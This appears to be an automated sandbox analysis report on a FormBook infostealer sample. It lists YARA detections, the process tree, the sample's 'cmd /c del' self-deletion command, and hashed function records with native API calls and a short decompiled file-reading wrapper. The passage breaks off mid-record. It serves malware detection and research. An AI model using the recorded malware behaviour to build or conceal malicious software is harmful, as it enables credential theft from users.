Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5676 Parent PID: 7004

General

Start time:	19:59:39
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3740 Parent PID: 5676

General

Start time:	19:59:40
Start date:	02/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 1D4l9eR0W4.exe PID: 1476 Parent PID: 5696 1D4l9eR0W4.exeCOMMON

Executed Functions

Function 01599828, Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01599A6E

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9d54994b97c753d2ba3b7d426bc61dd95d29f5d5eb8a78732f907bb9ac22aa3f
Instruction ID: c6944e87e224178248d6a655b16c1e7ffa4f271fa987b48b8315e998df484caa
Opcode Fuzzy Hash: 9d54994b97c753d2ba3b7d426bc61dd95d29f5d5eb8a78732f907bb9ac22aa3f
Instruction Fuzzy Hash: 6A713970A00B068FDB24DF6AC05575BBBF5FF88208F04892DD55ADBA50D734E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01594118, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01595669

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8a91cbd2c49158cf3f5e47699c6fc28d1e4e0bb2990ed30a150ea75d876d4ef9
Instruction ID: 2160e7ac3b4bf8d9b17edc668a169fb479704985bfa5b8f408d122ad8dc9f365
Opcode Fuzzy Hash: 8a91cbd2c49158cf3f5e47699c6fc28d1e4e0bb2990ed30a150ea75d876d4ef9
Instruction Fuzzy Hash: 6041F570C0061CCBDB15DF99C884BDEBBB5FF88308F20856AD409AB251DB75594ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 015955AD, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01595669

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1c2c264a33a223e4c105117bdd6fc9d76c8438ef7179dc97fd13ca3fbaf2b794
Instruction ID: d00cd775f6caf75dc7e9b1718546038ce24c10916f8b998899e652fdaaadb03f
Opcode Fuzzy Hash: 1c2c264a33a223e4c105117bdd6fc9d76c8438ef7179dc97fd13ca3fbaf2b794
Instruction Fuzzy Hash: 2B4114B1C0061CCFDB15DFA9C984BDEBBB5BF88308F20856AD409AB250DB75594ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 0159C1F9, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159C0FE,?,?,?,?,?), ref: 0159C1BF

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: da0844cc34735fb766e524f210a59cfe9be0e4fc4dab14e004f7ed624270e70f
Instruction ID: e877f712577123e451b462eb43e7013d2a90ae290ef164d28c911595cdcd99fc
Opcode Fuzzy Hash: da0844cc34735fb766e524f210a59cfe9be0e4fc4dab14e004f7ed624270e70f
Instruction Fuzzy Hash: 5C313874650304DFEB148F6AE45AB6A3FB9FB89300F10A26AE9058B3C1EF744C41DB21

Uniqueness

Uniqueness Score: -1.00%

Function 01598C00, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599EE9,00000800,00000000,00000000), ref: 0159A0FA

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 289484f068c7018efb129755613448c3fa0457d47a81d63093e237a04ffa77cb
Instruction ID: 8b8a91f03c1d3014134710697ab14361ae184e4736b4b8d3b69cf5379cdf488f
Opcode Fuzzy Hash: 289484f068c7018efb129755613448c3fa0457d47a81d63093e237a04ffa77cb
Instruction Fuzzy Hash: 182164B69043498FCB10CFAAC844ADEFFF4BB49214F08842AD955AB200C375A809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0159BA6C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159C0FE,?,?,?,?,?), ref: 0159C1BF

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 071686179d1a56dff7bdd4128cc4b37f7a823e4cee7694865716330434dcc2f3
Instruction ID: d9148b79b522e9f7c208ee90ed0d86a895479a76eb08fd445529f4a94bf91824
Opcode Fuzzy Hash: 071686179d1a56dff7bdd4128cc4b37f7a823e4cee7694865716330434dcc2f3
Instruction Fuzzy Hash: 9521E3B59002489FDF10CF99D884AEEFBF8FB48324F14841AE915A7310D778A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0159C130, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159C0FE,?,?,?,?,?), ref: 0159C1BF

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 68f469bd623850b1aff42dfb832a2e57ac383735a8b0f3cb3903f6809b2607f2
Instruction ID: d4cecd3dc527c1f64d6aceb60d3a2ec5c2b6bfa299b63e0dfb96ab2543767818
Opcode Fuzzy Hash: 68f469bd623850b1aff42dfb832a2e57ac383735a8b0f3cb3903f6809b2607f2
Instruction Fuzzy Hash: F621E3B59002089FDB10CFA9D884ADEBBF8FB48324F14841AE914A7310D778A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01598C18, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599EE9,00000800,00000000,00000000), ref: 0159A0FA

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 62c8028b134c241b0cf60878213f9f0520e50dc9cec759ba784437c637c9c5f1
Instruction ID: 022b37fa5b388c506f65031e365de7a7f4ffa8cf4d340d33dd5e90ed1b1f484c
Opcode Fuzzy Hash: 62c8028b134c241b0cf60878213f9f0520e50dc9cec759ba784437c637c9c5f1
Instruction Fuzzy Hash: BC1103B69042498FDB10CF9AC844B9EFBF4FB89324F14842EE915AB600C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0159A088, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599EE9,00000800,00000000,00000000), ref: 0159A0FA

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f60adcd5f916b44a7dddd0ef4fd2ec84b79ad0c16682b51870132cdaf081f3b7
Instruction ID: 6fa55b5d22f05088bb541a618d1d388941c7306bddf83854e25d7d6657b8f57b
Opcode Fuzzy Hash: f60adcd5f916b44a7dddd0ef4fd2ec84b79ad0c16682b51870132cdaf081f3b7
Instruction Fuzzy Hash: 861126B6D002098FDB10CF9AC585ADEFBF4FB88324F14841ED519AB210C775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01599A08, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01599A6E

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bb237446091d239668c8cde0089c9e313ddca053395c1eb9df59297550a5a0bf
Instruction ID: ae9edc44033f524be70e764ee95394a9fd9a55dd92f31556462c43d917c9d4cc
Opcode Fuzzy Hash: bb237446091d239668c8cde0089c9e313ddca053395c1eb9df59297550a5a0bf
Instruction Fuzzy Hash: D311E3B5D006598FDF10CF9AC444BDEFBF4FB88224F14851AD429A7610C779A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0149D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446ad86cb0cfbe8a258d446c472b95a8a1dd8bf2eb35f84509434c08774dffc5
Instruction ID: 1df4a436bdb385e092fdcfb0003e97e322846a60d2e45bca985895803c013b89
Opcode Fuzzy Hash: 446ad86cb0cfbe8a258d446c472b95a8a1dd8bf2eb35f84509434c08774dffc5
Instruction Fuzzy Hash: 9D21D3B1904240DFDF05DF94D9C0B27BF65FB88728F24856AE9054B266C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0149D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed7742d073b662e94bddbc66592dfedc059ff6093d011fc1e89fcf4f2cf28f0
Instruction ID: a7356d33fc29f25325692e77605d198d26c68940541ab6cae1c72ff9cf374ce9
Opcode Fuzzy Hash: eed7742d073b662e94bddbc66592dfedc059ff6093d011fc1e89fcf4f2cf28f0
Instruction Fuzzy Hash: 8921F4B1904244DFDF05CF94D9C0B56BF65FB88324F24857AE9094B22AC336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014AD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664827729.00000000014AD000.00000040.00000001.sdmp, Offset: 014AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a204d6922fbac5d6bc21c699b65cfbd78e735a689e141f759f5df6ad6278a763
Instruction ID: 61ccff2e08dda11cf622b1c18c043bc73dfea886ec64584e3a17255cee3a2752
Opcode Fuzzy Hash: a204d6922fbac5d6bc21c699b65cfbd78e735a689e141f759f5df6ad6278a763
Instruction Fuzzy Hash: FA2167B1948200DFCB14CF94D8C0B16BBA5FB88358F60C96ED8094B766C736D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014AD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664827729.00000000014AD000.00000040.00000001.sdmp, Offset: 014AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4905b9565a6161a32978637827221cc90bd73ac3a21ac42bcec47e69cdf21e
Instruction ID: f0c369803fd2153ea04f19d0b18360e2aa6ff10c1b65f2e976a03cdebbbaddda
Opcode Fuzzy Hash: ba4905b9565a6161a32978637827221cc90bd73ac3a21ac42bcec47e69cdf21e
Instruction Fuzzy Hash: 7F2137B2904200DFDB01CF94C9C0B26BBA5FB88324F64C97EE8094B762C736D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014AD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664827729.00000000014AD000.00000040.00000001.sdmp, Offset: 014AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c713749c41558167c64ac0abd289442be00f448ff3d03ab0ab014c768d2ec273
Instruction ID: 25b9fd559d27409d831c3da0b8ca046157ac13ab759603e7ef4c99aaef557149
Opcode Fuzzy Hash: c713749c41558167c64ac0abd289442be00f448ff3d03ab0ab014c768d2ec273
Instruction Fuzzy Hash: 062192755493808FCB03CF64D590716BF71EB46214F29C5DBD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0149D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227e353f2343cd41bb7eb5188246d0b1b41277c3d74b2a7836d139f6d83b98d2
Instruction ID: 17b831cbc63cf91a50f2fe171c6889ba2c92a88abb1651909bf93430baa50e0c
Opcode Fuzzy Hash: 227e353f2343cd41bb7eb5188246d0b1b41277c3d74b2a7836d139f6d83b98d2
Instruction Fuzzy Hash: B4119076804240DFDF12CF54D5C4B56BF61FB84224F2486AAD9090B666C33AD456CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0149D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227e353f2343cd41bb7eb5188246d0b1b41277c3d74b2a7836d139f6d83b98d2
Instruction ID: a589b9bc9a3bce6b253030669765104846a04b56acf19fcdf6227ff560fc8438
Opcode Fuzzy Hash: 227e353f2343cd41bb7eb5188246d0b1b41277c3d74b2a7836d139f6d83b98d2
Instruction Fuzzy Hash: C111AF76804280CFCF12CF54D9C4B16BF71FB84324F28C6AAD8454B66AC336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 014AD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664827729.00000000014AD000.00000040.00000001.sdmp, Offset: 014AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ced552c080a60b292e7faf2efdb3ccb181949a652e447f104397ca6f87f90c7
Instruction ID: 3ab9edc179eada4f0011def3a09a78b843d9362e777006eb80ac9097e361a03d
Opcode Fuzzy Hash: 0ced552c080a60b292e7faf2efdb3ccb181949a652e447f104397ca6f87f90c7
Instruction Fuzzy Hash: 86118E76904280DFDB12CF54D5C4B16BB61FB84224F28C6AAD8494B766C33AD45ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 0149D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e83d80014f5139e7ed540bf9ab94ca34e8b4314f863b4e81f870cec9e55745
Instruction ID: 5d4f2e1e32703fedfd1453b8ec0db5ed85b3d0c176de00da1567f89ce9d98042
Opcode Fuzzy Hash: a1e83d80014f5139e7ed540bf9ab94ca34e8b4314f863b4e81f870cec9e55745
Instruction Fuzzy Hash: 930147718087C0AAEF104A95CCC4B6BBF9CEF41224F08849BEE041B252D7399841CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0149D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664815922.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5962e5920e0d2de6159d140e83ae1049f286267f15bb6385be8bf65f942194
Instruction ID: 55951f2fcf7ebc44d55eb39e8f7a6a6328efa960530f6925dcbc5bc3e734313f
Opcode Fuzzy Hash: 1c5962e5920e0d2de6159d140e83ae1049f286267f15bb6385be8bf65f942194
Instruction Fuzzy Hash: D1F0C271404284AFEB108E59CCC4B67FF98EB41234F18C45BED081B396C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0159E9F8, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281842e70b329ebb1750ecb0a5ca15789e59f2b703b177f2e305c7ad9a62762a
Instruction ID: fa4736351be6eab6a4c303daf6f02e1fbf37bb97496504a556c96efe494f6c53
Opcode Fuzzy Hash: 281842e70b329ebb1750ecb0a5ca15789e59f2b703b177f2e305c7ad9a62762a
Instruction Fuzzy Hash: 1812DDF142174A8BE712CF65E49A1893FA9BF65328F506309F2631B6D4DFB8014ACF49

Uniqueness

Uniqueness Score: -1.00%

Function 0159BD9C, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813635d990c9fde3f09e1d3da2d64f54c33d481505f0ba99a975aa327936eec3
Instruction ID: a8192ec7e8e1bc1ac5c9eb65d7348acfda6df0a668c3af62f745322016ff4a13
Opcode Fuzzy Hash: 813635d990c9fde3f09e1d3da2d64f54c33d481505f0ba99a975aa327936eec3
Instruction Fuzzy Hash: C0A17D32E1061ACFCF05DFA5C9445DEBBB2FF84300B15856AE905AF221EB35A955CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0159E9EA, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.664907536.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27480d80943345b42d803833534669587b73c2e9e0294732f6732ac303cc48ee
Instruction ID: 62f067bc2fd3069ad40ba64c975ea3607801aa5f9abc9f29eb2ff7cb37bf98b6
Opcode Fuzzy Hash: 27480d80943345b42d803833534669587b73c2e9e0294732f6732ac303cc48ee
Instruction Fuzzy Hash: 78C110B182174E8AD712CF64E4961897FB9BF65328F506309F1632B6D4DFB8104ACF49

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1D4l9eR0W4.exe PID: 5548 Parent PID: 1476 1D4l9eR0W4.exeCOMMON

Executed Functions

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}

0x004186a3
0x004186af
0x004186b7
0x004186bc
0x004186e5
0x004186e9

APIs

NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5

Strings

A:A, xrefs: 004186BC, 004186C8

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: A:A
API String ID: 2738559852-2859176346
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185EB, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1ee3c39deeadf98cb841534be57f158b66a54b1c601e6a1fab596b1d55c6f46
Instruction ID: 7bd75506c99113c3f2fcf742959a20a59def4d08905b8b9cbd155e3c0d31d8b7
Opcode Fuzzy Hash: c1ee3c39deeadf98cb841534be57f158b66a54b1c601e6a1fab596b1d55c6f46
Instruction Fuzzy Hash: 7C01F2B6205108AFCB08CF98CC84EEB37A9AF8C354F05824CFA0C93241C630E840CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041871A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f6c640b8d44de7097eb98d3f5b91c0aeb31e641a574b77041f0e354ba1bf0476
Instruction ID: 3af00c2736461e378753e01795f4845b55c14c9d31dd24b5aa2810bbf47efbb9
Opcode Fuzzy Hash: f6c640b8d44de7097eb98d3f5b91c0aeb31e641a574b77041f0e354ba1bf0476
Instruction Fuzzy Hash: 7DE08C752002007BD720DBA8CC89EE77B18EF49220F154299BA68AB292C130AA80C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745

Memory Dump Source

Source File: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 018D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D99AA

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166

Uniqueness

Uniqueness Score: -1.00%

Function 018D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018D991A

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
Instruction ID: c0a67213e876ddc94ff44a26181adf9b9571e8130a3221a5a2f75721572d34a8
Opcode Fuzzy Hash: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
